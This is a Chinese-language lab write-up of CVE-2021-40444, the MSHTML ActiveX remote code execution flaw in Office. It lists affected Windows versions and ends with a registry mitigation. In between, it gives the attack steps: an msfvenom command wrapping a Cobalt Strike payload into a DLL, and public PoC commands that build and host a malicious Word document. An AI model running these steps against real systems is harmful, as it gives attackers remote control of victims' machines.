zoukankan      html  css  js  c++  java

  • CVE-2021-40444 MSHTML RCE学习

    影响范围

    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2022
    Windows Server 2019 (Server Core installation)
    Windows Server 2019
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server 2012 R2 (Server Core installation)
    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2012
    Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows RT 8.1
    Windows 8.1 for x64-based systems
    Windows 8.1 for 32-bit systems
    Windows 7 for x64-based Systems Service Pack 1
    Windows 7 for 32-bit Systems Service Pack 1
    Windows 10 for x64-based Systems
    Windows 10 for 32-bit Systems
    Windows 10 Version 21H1 for x64-based Systems
    Windows 10 Version 21H1 for ARM64-based Systems
    Windows 10 Version 21H1 for 32-bit Systems
    Windows 10 Version 20H2 for x64-based Systems
    Windows 10 Version 20H2 for ARM64-based Systems
    Windows 10 Version 20H2 for 32-bit Systems
    Windows 10 Version 2004 for x64-based Systems
    Windows 10 Version 2004 for ARM64-based Systems
    Windows 10 Version 2004 for 32-bit Systems
    Windows 10 Version 1909 for x64-based Systems
    Windows 10 Version 1909 for ARM64-based Systems
    Windows 10 Version 1909 for 32-bit Systems
    Windows 10 Version 1809 for x64-based Systems
    Windows 10 Version 1809 for ARM64-based Systems
    Windows 10 Version 1809 for 32-bit Systems
    Windows 10 Version 1607 for x64-based Systems
    Windows 10 Version 1607 for 32-bit Systems

    漏洞概述

    2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。

    MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word、Excel或PowerPoint文档中呈现Web托管的内容,AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。

    漏洞学习

    • 攻击鸡:kali 192.168.2.103
    • 靶机 Microsoft Windows 10 专业工作站版 OS 版本: 10.0.18362 暂缺 Build 18362 192.168.2.143
      POC下载
      1、生成远控dll

    (1)CS设置本地监听,生成RAW

    (2)msf生成dll

    msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o shell.dll

    2、利用POC将dll加载到word

    python3 exploit.py generate shell.dll http://192.168.2.103


    3、本地开启监听

    python3 exploit.py host 80

    4、靶机运行word,CS上线

    漏洞修复

    创建一个reg文件,输入以下内容并且执行

    Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet Settingsones]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet Settingsones1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet Settingsones2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCurrentVersionInternet Settingsones3]
"1001"=dword:00000003
"1004"=dword:00000003
  • 相关阅读:
    Nginx 七层反向代理
    Nginx Rewrite域名及资源重定向!(重点)
    对FPM 模块进行参数优化!
    Nginx压力测试及通用优化
    LNMP架构及应用部署!(重点)
    安装PHP解析环境!
    Mysql安装并修改字符集 ----> 基于源码包安装
    Nginx安装部署!
    python入门
    Android学习进度三
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/15319766.html
Copyright © 2011-2022 走看看